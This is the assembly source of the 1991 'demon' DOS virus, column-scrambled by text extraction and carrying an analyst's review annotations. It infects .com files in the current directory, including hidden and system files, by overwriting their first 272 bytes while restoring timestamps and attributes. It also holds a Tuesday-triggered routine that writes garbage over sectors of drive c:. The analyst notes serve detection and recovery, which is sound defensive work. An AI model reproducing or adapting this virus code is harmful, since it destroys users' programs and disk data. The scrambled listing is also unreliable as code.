; NOTE(review): lines marked "NOTE(review)" are analyst annotations; every other
; line is kept exactly as found. The listing is column-scrambled by text
; extraction: labels, mnemonics, operands and comments sit on separate lines.
; NOTE(review): summary drawn from the author's own comments below: a 272-byte
; overwriting infector of .com files in the current directory, plus a
; date-triggered disk-write routine aimed at drive c:.
;========== demon virus ==================================== 22.09.91 ======== ; ; assemble and link with: tasm demon.vir ; tlink demon /x/t ; infect all .com programs in current directory with: demon ; ; !!! not on a tuesday !!! ; ;-------------- constants and structures tuesday
=
2
; int 21h, ah=2ah
search_rec
struc db db dw dw dd db ends
21 dup (?) ? ? ? ? 13 dup (?)
; directory search record ; reserved for dos ; file attribute ; packed file time ; packed file date ; long file size ; asciiz filename.ext
fileattr filetime filedate filesize filename search_rec
;-------------- demon virus segment virus
dta demon: virus_size
infect:
next_file: check_day:
thrash_drive: write_sectors:
segment assume cs:virus,ds:virus,es:virus,ss:virus org 0080h search_rec <>
; disk transfer area
org
0100h
=
virus_end - demon
; NOTE(review): the file search uses DOS find-first / find-next (int 21h,
; ah=4eh / ah=4fh) with the '*.com' pattern and, per the author's comment,
; includes hidden and system files, so hiding a file by attribute does not
; keep it out of the search.
mov mov mov int nop jnc jmp call mov mov int nop jnc jmp jmp mov int cmp je mov int
dx,offset all_com ah,4eh cx,110bh 21h
; find first .com file, ; including hidden/system
infect short check_day replicate dx,offset dta ah,4fh 21h
; abort if no files found
mov jmp mov
counter,0 write_sectors al,drive_c
next_file short check_day infect ah,2ah 21h al,tuesday thrash_drive ah,4ch 21h
; virus entry point ; virus size = 272 bytes
; overwrite first 272 bytes ; find next .com file, ; go check day if none found ; else repeat
; NOTE(review): the trigger is the DOS date call (int 21h, ah=2ah) compared
; against tuesday (= 2). The author marks the sector-overwrite routine as not
; working; for triage the intent is still destructive, and an int 26h
; (absolute disk write) call inside a small .com file is a strong behavioural
; indicator on its own.
; get dos date, check day ; tuesday ? ; if yes, thrash drive c: ; else exit to dos ; overwrite first 160 sectors ; of drive c: with garbage ; error: doesn't work !
show_msg:
replicate:
all_com com_date com_time com_attr counter drive_c
mov mov mov int inc cmp je jne mov mov int mov int
cx,160 dx,0 bx,0 26h counter counter,10 show_msg write_sectors ah,09h dx,offset virus_msg 21h ah,4ch 21h
; ; ; ;
; NOTE(review): replicate saves the file attribute, clears it (author: in case
; the file is read-only), opens the file r/w, saves its date and time, writes
; virus_size bytes starting at label demon, then restores date/time and the
; attribute. A read-only flag or an unchanged timestamp therefore says nothing
; about whether a file was altered; compare content hashes or known-good
; copies instead. Nothing visible here saves the overwritten host bytes, so an
; affected file is recovered from backup rather than repaired.
mov mov int mov nop xor mov int nop mov int nop jc mov mov int nop mov mov mov mov mov int nop mov mov mov int mov int nop mov mov mov int retn
dx,offset dta.filename ax,4300h 21h com_attr,cx
; save file attribute
cx,cx ax,4301h 21h
; unprotect the .com file ; in case it's read-only
ax,3d02h 21h
; open .com file for r/w, ; abort on error
db dw dw dw db db dw
check_day bx,ax ax,5700h 21h com_time,cx com_date,dx dx,offset demon ah,40h cx,virus_size 21h
al=c:, cx=160 sectors dx=highest sector in drive ! ds:bx=start of psp area overwrite sectors
; repeat 10 times ; show a fake error message ; and exit to dos
; bx = file handle ; save file date and time
; overwrite first 272 bytes ; of .com program file ; with the virus code
ax,5701h dx,com_date cx,com_time 21h ah,3eh 21h
; restore file date and time
dx,offset dta.filename cx,com_attr ax,4301h 21h
; restore file attribute
'*.com',0 0 0 0 0 2 0
; ; ; ; ; ;
; close the file
dir search specification packed .com program date packed .com program time .com program file attribute used when thrashing drive c: int 26h c: drive number
; NOTE(review): static markers for detection. The '*.com' pattern, the
; copyright string and the fake error text below all lie between demon and
; virus_end, so they are part of the identical virus_size-byte prefix written
; to the start of every affected .com file.
copyright virus_msg
db dw db
'demonhyak viri x.x (c) by cracker jack 1991 (ivrl)' 0 10,13,'error eating drive c:',10,13,'$'
virus_end
label
byte
virus
ends end
demon
; virus code+data end
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;